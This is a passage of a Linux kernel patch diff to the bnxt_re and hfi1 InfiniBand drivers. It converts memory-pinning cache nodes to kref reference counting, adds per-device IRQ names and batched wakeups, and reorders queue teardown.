+ static u32 bnxt_qplib_put_sges(struct bnxt_qplib_hwq *hwq,
+@@ -2056,7 +2066,7 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 	hwq_attr.sginfo = &cq->sg_info;
+ 	rc = bnxt_qplib_alloc_init_hwq(&cq->hwq, &hwq_attr);
+ 	if (rc)
+-		goto exit;
++		return rc;
+ 
+ 	RCFW_CMD_PREP(req, CREATE_CQ, cmd_flags);
+ 
+@@ -2097,7 +2107,6 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 
+ fail:
+ 	bnxt_qplib_free_hwq(res, &cq->hwq);
+-exit:
+ 	return rc;
+ }
+ 
+@@ -2725,11 +2734,8 @@ static int bnxt_qplib_cq_process_terminal(struct bnxt_qplib_cq *cq,
+ 
+ 	qp = (struct bnxt_qplib_qp *)((unsigned long)
+ 				      le64_to_cpu(hwcqe->qp_handle));
+-	if (!qp) {
+-		dev_err(&cq->hwq.pdev->dev,
+-			"FP: CQ Process terminal qp is NULL\n");
++	if (!qp)
+ 		return -EINVAL;
+-	}
+ 
+ 	/* Must block new posting of SQ and RQ */
+ 	qp->state = CMDQ_MODIFY_QP_NEW_STATE_ERR;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index 0375019525431..f859710f9a7f4 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -471,7 +471,7 @@ typedef int (*srqn_handler_t)(struct bnxt_qplib_nq *nq,
+ struct bnxt_qplib_nq {
+ 	struct pci_dev			*pdev;
+ 	struct bnxt_qplib_res		*res;
+-	char				name[32];
++	char				*name;
+ 	struct bnxt_qplib_hwq		hwq;
+ 	struct bnxt_qplib_nq_db		nq_db;
+ 	u16				ring_id;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
+index 061b2895dd9b5..75e0c42f6f424 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
+@@ -181,7 +181,7 @@ static int __send_message(struct bnxt_qplib_rcfw *rcfw, struct cmdq_base *req,
+ 	} while (size > 0);
+ 	cmdq->seq_num++;
+ 
+-	cmdq_prod = hwq->prod;
++	cmdq_prod = hwq->prod & 0xFFFF;
+ 	if (test_bit(FIRMWARE_FIRST_FLAG, &cmdq->flags)) {
+ 		/* The very first doorbell write
+ 		 * is required to set this flag
+@@ -299,7 +299,8 @@ static int bnxt_qplib_process_func_event(struct bnxt_qplib_rcfw *rcfw,
+ }
+ 
+ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+-				       struct creq_qp_event *qp_event)
++				       struct creq_qp_event *qp_event,
++				       u32 *num_wait)
+ {
+ 	struct creq_qp_error_notification *err_event;
+ 	struct bnxt_qplib_hwq *hwq = &rcfw->cmdq.hwq;
+@@ -308,6 +309,7 @@ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+ 	u16 cbit, blocked = 0;
+ 	struct pci_dev *pdev;
+ 	unsigned long flags;
++	u32 wait_cmds = 0;
+ 	__le16  mcookie;
+ 	u16 cookie;
+ 	int rc = 0;
+@@ -367,9 +369,10 @@ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+ 		crsqe->req_size = 0;
+ 
+ 		if (!blocked)
+-			wake_up(&rcfw->cmdq.waitq);
++			wait_cmds++;
+ 		spin_unlock_irqrestore(&hwq->lock, flags);
+ 	}
++	*num_wait += wait_cmds;
+ 	return rc;
+ }
+ 
+@@ -383,6 +386,7 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 	struct creq_base *creqe;
+ 	u32 sw_cons, raw_cons;
+ 	unsigned long flags;
++	u32 num_wakeup = 0;
+ 
+ 	/* Service the CREQ until budget is over */
+ 	spin_lock_irqsave(&hwq->lock, flags);
+@@ -401,7 +405,8 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 		switch (type) {
+ 		case CREQ_BASE_TYPE_QP_EVENT:
+ 			bnxt_qplib_process_qp_event
+-				(rcfw, (struct creq_qp_event *)creqe);
++				(rcfw, (struct creq_qp_event *)creqe,
++				 &num_wakeup);
+ 			creq->stats.creq_qp_event_processed++;
+ 			break;
+ 		case CREQ_BASE_TYPE_FUNC_EVENT:
+@@ -429,6 +434,8 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 				      rcfw->res->cctx, true);
+ 	}
+ 	spin_unlock_irqrestore(&hwq->lock, flags);
++	if (num_wakeup)
++		wake_up_nr(&rcfw->cmdq.waitq, num_wakeup);
+ }
+ 
+ static irqreturn_t bnxt_qplib_creq_irq(int irq, void *dev_instance)
+@@ -598,7 +605,7 @@ int bnxt_qplib_alloc_rcfw_channel(struct bnxt_qplib_res *res,
+ 		rcfw->cmdq_depth = BNXT_QPLIB_CMDQE_MAX_CNT_8192;
+ 
+ 	sginfo.pgsize = bnxt_qplib_cmdqe_page_size(rcfw->cmdq_depth);
+-	hwq_attr.depth = rcfw->cmdq_depth;
++	hwq_attr.depth = rcfw->cmdq_depth & 0x7FFFFFFF;
+ 	hwq_attr.stride = BNXT_QPLIB_CMDQE_UNITS;
+ 	hwq_attr.type = HWQ_TYPE_CTX;
+ 	if (bnxt_qplib_alloc_init_hwq(&cmdq->hwq, &hwq_attr)) {
+@@ -635,6 +642,10 @@ void bnxt_qplib_rcfw_stop_irq(struct bnxt_qplib_rcfw *rcfw, bool kill)
+ 	struct bnxt_qplib_creq_ctx *creq;
+ 
+ 	creq = &rcfw->creq;
++
++	if (!creq->requested)
++		return;
++
+ 	tasklet_disable(&creq->creq_tasklet);
+ 	/* Mask h/w interrupts */
+ 	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, rcfw->res->cctx, false);
+@@ -643,10 +654,10 @@ void bnxt_qplib_rcfw_stop_irq(struct bnxt_qplib_rcfw *rcfw, bool kill)
+ 	if (kill)
+ 		tasklet_kill(&creq->creq_tasklet);
+ 
+-	if (creq->requested) {
+-		free_irq(creq->msix_vec, rcfw);
+-		creq->requested = false;
+-	}
++	free_irq(creq->msix_vec, rcfw);
++	kfree(creq->irq_name);
++	creq->irq_name = NULL;
++	creq->requested = false;
+ }
+ 
+ void bnxt_qplib_disable_rcfw_channel(struct bnxt_qplib_rcfw *rcfw)
+@@ -678,9 +689,11 @@ int bnxt_qplib_rcfw_start_irq(struct bnxt_qplib_rcfw *rcfw, int msix_vector,
+ 			      bool need_init)
+ {
+ 	struct bnxt_qplib_creq_ctx *creq;
++	struct bnxt_qplib_res *res;
+ 	int rc;
+ 
+ 	creq = &rcfw->creq;
++	res = rcfw->res;
+ 
+ 	if (creq->requested)
+ 		return -EFAULT;
+@@ -690,13 +703,22 @@ int bnxt_qplib_rcfw_start_irq(struct bnxt_qplib_rcfw *rcfw, int msix_vector,
+ 		tasklet_setup(&creq->creq_tasklet, bnxt_qplib_service_creq);
+ 	else
+ 		tasklet_enable(&creq->creq_tasklet);
++
++	creq->irq_name = kasprintf(GFP_KERNEL, "bnxt_re-creq@pci:%s",
++				   pci_name(res->pdev));
++	if (!creq->irq_name)
++		return -ENOMEM;
+ 	rc = request_irq(creq->msix_vec, bnxt_qplib_creq_irq, 0,
+-			 "bnxt_qplib_creq", rcfw);
+-	if (rc)
++			 creq->irq_name, rcfw);
++	if (rc) {
++		kfree(creq->irq_name);
++		creq->irq_name = NULL;
++		tasklet_disable(&creq->creq_tasklet);
+ 		return rc;
++	}
+ 	creq->requested = true;
+ 
+-	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, rcfw->res->cctx, true);
++	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, res->cctx, true);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
+index 0a3d8e7da3d42..b887e7fbad9ef 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
+@@ -174,6 +174,7 @@ struct bnxt_qplib_creq_ctx {
+ 	u16				ring_id;
+ 	int				msix_vec;
+ 	bool				requested; /*irq handler installed */
++	char				*irq_name;
+ };
+ 
+ /* RCFW Communication Channels */
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 8973a081d641e..e7d831330278d 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,11 +215,11 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
+-				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+-				      skb_frag_size(frag));
++				      skb_frag_size(frag),
++				      NULL, NULL, NULL);
+ 		if (unlikely(ret))
+ 			break;
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 71b9ac0188875..94f1701667301 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -19,8 +19,7 @@ static int mmu_notifier_range_start(struct mmu_notifier *,
+ 		const struct mmu_notifier_range *);
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *,
+ 					   unsigned long, unsigned long);
+-static void do_remove(struct mmu_rb_handler *handler,
+-		      struct list_head *del_list);
++static void release_immediate(struct kref *refcount);
+ static void handle_remove(struct work_struct *work);
+ 
+ static const struct mmu_notifier_ops mn_opts = {
+@@ -103,7 +102,11 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	do_remove(handler, &del_list);
++	while (!list_empty(&del_list)) {
++		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
++		list_del(&rbnode->list);
++		kref_put(&rbnode->refcount, release_immediate);
++	}
+ 
+ 	/* Now the mm may be freed. */
+ 	mmdrop(handler->mn.mm);
+@@ -131,12 +134,6 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+ 	list_add_tail(&mnode->list, &handler->lru_list);
+-
+-	ret = handler->ops->insert(handler->ops_arg, mnode);
+-	if (ret) {
+-		__mmu_int_rb_remove(mnode, &handler->root);
+-		list_del(&mnode->list); /* remove from LRU list */
+-	}
+ 	mnode->handler = handler;
+ unlock:
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+@@ -180,6 +177,48 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
++/*
++ * Must NOT call while holding mnode->handler->lock.
++ * mnode->handler->ops->remove() may sleep and mnode->handler->lock is a
++ * spinlock.
++ */
++static void release_immediate(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	mnode->handler->ops->remove(mnode->handler->ops_arg, mnode);
++}
++
++/* Caller must hold mnode->handler->lock */
++static void release_nolock(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	list_move(&mnode->list, &mnode->handler->del_list);
++	queue_work(mnode->handler->wq, &mnode->handler->del_work);
++}
++
++/*
++ * struct mmu_rb_node->refcount kref_put() callback.
++ * Adds mmu_rb_node to mmu_rb_node->handler->del_list and queues
++ * handler->del_work on handler->wq.
++ * Does not remove mmu_rb_node from handler->lru_list or handler->rb_root.
++ * Acquires mmu_rb_node->handler->lock; do not call while already holding
++ * handler->lock.
++ */
++void hfi1_mmu_rb_release(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	struct mmu_rb_handler *handler = mnode->handler;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	list_move(&mnode->list, &mnode->handler->del_list);
++	spin_unlock_irqrestore(&handler->lock, flags);
++	queue_work(handler->wq, &handler->del_work);
++}
++
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -194,6 +233,10 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
++		/* refcount == 1 implies mmu_rb_handler has only rbnode ref */
++		if (kref_read(&rbnode->refcount) > 1)
++			continue;
++
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -206,7 +249,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+ 	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+-		handler->ops->remove(handler->ops_arg, rbnode);
++		kref_put(&rbnode->refcount, release_immediate);
+ 	}
+ }
+ 
+@@ -218,7 +261,6 @@ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 	struct rb_root_cached *root = &handler->root;
+ 	struct mmu_rb_node *node, *ptr = NULL;
+ 	unsigned long flags;
+-	bool added = false;
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	for (node = __mmu_int_rb_iter_first(root, range->start, range->end-1);
+@@ -227,38 +269,16 @@ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		ptr = __mmu_int_rb_iter_next(node, range->start,
+ 					     range->end - 1);
+ 		trace_hfi1_mmu_mem_invalidate(node->addr, node->len);
+-		if (handler->ops->invalidate(handler->ops_arg, node)) {
+-			__mmu_int_rb_remove(node, root);
+-			/* move from LRU list to delete list */
+-			list_move(&node->list, &handler->del_list);
+-			added = true;
+-		}
++		/* Remove from rb tree and lru_list. */
++		__mmu_int_rb_remove(node, root);
++		list_del_init(&node->list);
++		kref_put(&node->refcount, release_nolock);
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	if (added)
+-		queue_work(handler->wq, &handler->del_work);
+-
+ 	return 0;
+ }
+ 
+-/*
+- * Call the remove function for the given handler and the list.  This
+- * is expected to be called with a delete list extracted from handler.
+- * The caller should not be holding the handler lock.
+- */
+-static void do_remove(struct mmu_rb_handler *handler,
+-		      struct list_head *del_list)
+-{
+-	struct mmu_rb_node *node;
+-
+-	while (!list_empty(del_list)) {
+-		node = list_first_entry(del_list, struct mmu_rb_node, list);
+-		list_del(&node->list);
+-		handler->ops->remove(handler->ops_arg, node);
+-	}
+-}
+-
+ /*
+  * Work queue function to remove all nodes that have been queued up to
+  * be removed.  The key feature is that mm->mmap_lock is not being held
+@@ -271,11 +291,16 @@ static void handle_remove(struct work_struct *work)
+ 						del_work);
+ 	struct list_head del_list;
+ 	unsigned long flags;
++	struct mmu_rb_node *node;
+ 
+ 	/* remove anything that is queued to get removed */
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	list_replace_init(&handler->del_list, &del_list);
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	do_remove(handler, &del_list);
++	while (!list_empty(&del_list)) {
++		node = list_first_entry(&del_list, struct mmu_rb_node, list);
++		list_del(&node->list);
++		handler->ops->remove(handler->ops_arg, node);
++	}
+ }
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index ed75acdb7b839..dd2c4a0ae95b1 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -16,6 +16,7 @@ struct mmu_rb_node {
+ 	struct rb_node node;
+ 	struct mmu_rb_handler *handler;
+ 	struct list_head list;
++	struct kref refcount;
+ };
+ 
+ /*
+@@ -51,6 +52,8 @@ int hfi1_mmu_rb_register(void *ops_arg,
+ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
++void hfi1_mmu_rb_release(struct kref *refcount);
++
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+ struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
+ 					  unsigned long addr,
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index bb2552dd29c1e..26c62162759ba 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,7 +1593,20 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	system_descriptor_complete(dd, descp);
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx && descp->ctx_put)
++		descp->ctx_put(descp->pinning_ctx);
++	descp->pinning_ctx = NULL;
+ }
+ 
+ /*
+@@ -3113,8 +3126,8 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+-					 addr, tx->tlen);
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++					 addr, tx->tlen, NULL, NULL, NULL);
+ 	}
+ 
+ 	return 1;
+@@ -3157,9 +3170,9 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
+-		NULL,
+ 		dd->sdma_pad_phys,
+-		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)),
++		NULL, NULL, NULL);
+ 	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index 95aaec14c6c28..7fdebab202c4f 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,9 +594,11 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
+-	void *pinning_ctx,
+ 	dma_addr_t addr,
+-	size_t len)
++	size_t len,
++	void *pinning_ctx,
++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	struct sdma_desc *desc = &tx->descp[tx->num_desc];
+ 
+@@ -613,7 +615,11 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++
+ 	desc->pinning_ctx = pinning_ctx;
++	desc->ctx_put = ctx_put;
++	if (pinning_ctx && ctx_get)
++		ctx_get(pinning_ctx);
+ }
+ 
+ /* helper to extend txreq */
+@@ -645,18 +651,20 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
+-	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+-	u16 len)
++	u16 len,
++	void *pinning_ctx,
++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	int rval = 0;
+ 
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
+-		pinning_ctx,
+-		addr, len);
++		addr, len,
++		pinning_ctx, ctx_get, ctx_put);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+ 	tx->tlen -= len;
+@@ -676,11 +684,18 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
+- * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+  * @len: length in bytes
++ * @pinning_ctx: context to be stored on struct sdma_desc .pinning_ctx. Not
++ *               added if coalesce buffer is used. E.g. pointer to pinned-page
++ *               cache entry for the sdma_desc.
++ * @ctx_get: optional function to take reference to @pinning_ctx. Not called if
++ *           @pinning_ctx is NULL.
++ * @ctx_put: optional function to release reference to @pinning_ctx after
++ *           sdma_desc completes. May be called in interrupt context so must
++ *           not sleep. Not called if @pinning_ctx is NULL.
+  *
+  * This is used to add a page/offset/length descriptor.
+  *
+@@ -692,11 +707,13 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
+-	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+-	u16 len)
++	u16 len,
++	void *pinning_ctx,
++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	dma_addr_t addr;
+ 	int rval;
+@@ -720,7 +737,8 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, tx, addr, len,
++				 pinning_ctx, ctx_get, ctx_put);
+ }
+ 
+ /**
+@@ -754,8 +772,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
+-				 addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len,
++				 NULL, NULL, NULL);
+ }
+ 
+ /**
+@@ -801,7 +819,8 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx, addr, len,
++				 NULL, NULL, NULL);
+ }
+ 
+ struct iowait_work;
+@@ -1034,6 +1053,4 @@ u16 sdma_get_descq_cnt(void);
+ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+-
+-void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index fad946cb5e0d8..85ae7293c2741 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -20,6 +20,8 @@ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
+ 	void *pinning_ctx;
++	/* Release reference to @pinning_ctx. May be called in interrupt context. Must not sleep. */
++	void (*ctx_put)(void *ctx);
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index ae58b48afe074..02bd62b857b75 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -62,18 +62,14 @@ static int defer_packet_queue(
+ static void activate_packet_queue(struct iowait *wait, int reason);
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len);
+-static int sdma_rb_insert(void *arg, struct mmu_rb_node *mnode);
+ static int sdma_rb_evict(void *arg, struct mmu_rb_node *mnode,
+ 			 void *arg2, bool *stop);
+ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode);
+-static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode);
+ 
+ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.filter = sdma_rb_filter,
+-	.insert = sdma_rb_insert,
+ 	.evict = sdma_rb_evict,
+ 	.remove = sdma_rb_remove,
+-	.invalidate = sdma_rb_invalidate
+ };
+ 
+ static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
+@@ -247,14 +243,14 @@ int hfi1_user_sdma_free_queues(struct hfi1_filedata *fd,
+ 		spin_unlock(&fd->pq_rcu_lock);
+ 		synchronize_srcu(&fd->pq_srcu);
+ 		/* at this point there can be no more new requests */
+-		if (pq->handler)
+-			hfi1_mmu_rb_unregister(pq->handler);
+ 		iowait_sdma_drain(&pq->busy);
+ 		/* Wait until all requests have been freed. */
+ 		wait_event_interruptible(
+ 			pq->wait,
+ 			!atomic_read(&pq->n_reqs));
+ 		kfree(pq->reqs);
++		if (pq->handler)
++			hfi1_mmu_rb_unregister(pq->handler);
+ 		bitmap_free(pq->req_in_use);
+ 		kmem_cache_destroy(pq->txreq_cache);
+ 		flush_pq_iowait(pq);
+@@ -1275,25 +1271,17 @@ static void free_system_node(struct sdma_mmu_node *node)
+ 	kfree(node);
+ }
+ 
+-static inline void acquire_node(struct sdma_mmu_node *node)
+-{
+-	atomic_inc(&node->refcount);
+-	WARN_ON(atomic_read(&node->refcount) < 0);
+-}
+-
+-static inline void release_node(struct mmu_rb_handler *handler,
+-				struct sdma_mmu_node *node)
+-{
+-	atomic_dec(&node->refcount);
+-	WARN_ON(atomic_read(&node->refcount) < 0);
+-}
+-
++/*
++ * kref_get()'s an additional kref on the returned rb_node to prevent rb_node
++ * from being released until after rb_node is assigned to an SDMA descriptor
++ * (struct sdma_desc) under add_system_iovec_to_sdma_packet(), even if the
++ * virtual address range for rb_node is invalidated between now and then.
++ */
+ static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
+ 					      unsigned long start,
+ 					      unsigned long end)
+ {
+ 	struct mmu_rb_node *rb_node;
+-	struct sdma_mmu_node *node;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+@@ -1302,11 +1290,12 @@ static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
+ 		spin_unlock_irqrestore(&handler->lock, flags);
+ 		return NULL;
+ 	}
+-	node = container_of(rb_node, struct sdma_mmu_node, rb);
+-	acquire_node(node);
++
++	/* "safety" kref to prevent release before add_system_iovec_to_sdma_packet() */
++	kref_get(&rb_node->refcount);
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	return node;
++	return container_of(rb_node, struct sdma_mmu_node, rb);
+ }
+ 
+ static int pin_system_pages(struct user_sdma_request *req,
+@@ -1355,6 +1344,13 @@ retry:
+ 	return 0;
+ }
+ 
++/*
++ * kref refcount on *node_p will be 2 on successful addition: one kref from
++ * kref_init() for mmu_rb_handler and one kref to prevent *node_p from being
++ * released until after *node_p is assigned to an SDMA descriptor (struct
++ * sdma_desc) under add_system_iovec_to_sdma_packet(), even if the virtual
++ * address range for *node_p is invalidated between now and then.
++ */
+ static int add_system_pinning(struct user_sdma_request *req,
+ 			      struct sdma_mmu_node **node_p,
+ 			      unsigned long start, unsigned long len)
+@@ -1368,6 +1364,12 @@ static int add_system_pinning(struct user_sdma_request *req,
+ 	if (!node)
+ 		return -ENOMEM;
+ 
++	/* First kref "moves" to mmu_rb_handler */
++	kref_init(&node->rb.refcount);
++
++	/* "safety" kref to prevent release before add_system_iovec_to_sdma_packet() */
++	kref_get(&node->rb.refcount);
++
+ 	node->pq = pq;
+ 	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
+ 	if (ret == 0) {
+@@ -1431,15 +1433,15 @@ static int get_system_cache_entry(struct user_sdma_request *req,
+ 			return 0;
+ 		}
+ 
+-		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
+-			 node->rb.addr, atomic_read(&node->refcount));
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->rb.refcount %d",
++			 node->rb.addr, kref_read(&node->rb.refcount));
+ 		prepend_len = node->rb.addr - start;
+ 
+ 		/*
+ 		 * This node will not be returned, instead a new node
+ 		 * will be. So release the reference.
+ 		 */
+-		release_node(handler, node);
++		kref_put(&node->rb.refcount, hfi1_mmu_rb_release);
+ 
+ 		/* Prepend a node to cover the beginning of the allocation */
+ 		ret = add_system_pinning(req, node_p, start, prepend_len);
+@@ -1451,6 +1453,20 @@ static int get_system_cache_entry(struct user_sdma_request *req,
+ 	}
+ }
+ 
++static void sdma_mmu_rb_node_get(void *ctx)
++{
++	struct mmu_rb_node *node = ctx;
++
++	kref_get(&node->refcount);
++}
++
++static void sdma_mmu_rb_node_put(void *ctx)
++{
++	struct sdma_mmu_node *node = ctx;
++
++	kref_put(&node->rb.refcount, hfi1_mmu_rb_release);
++}
++
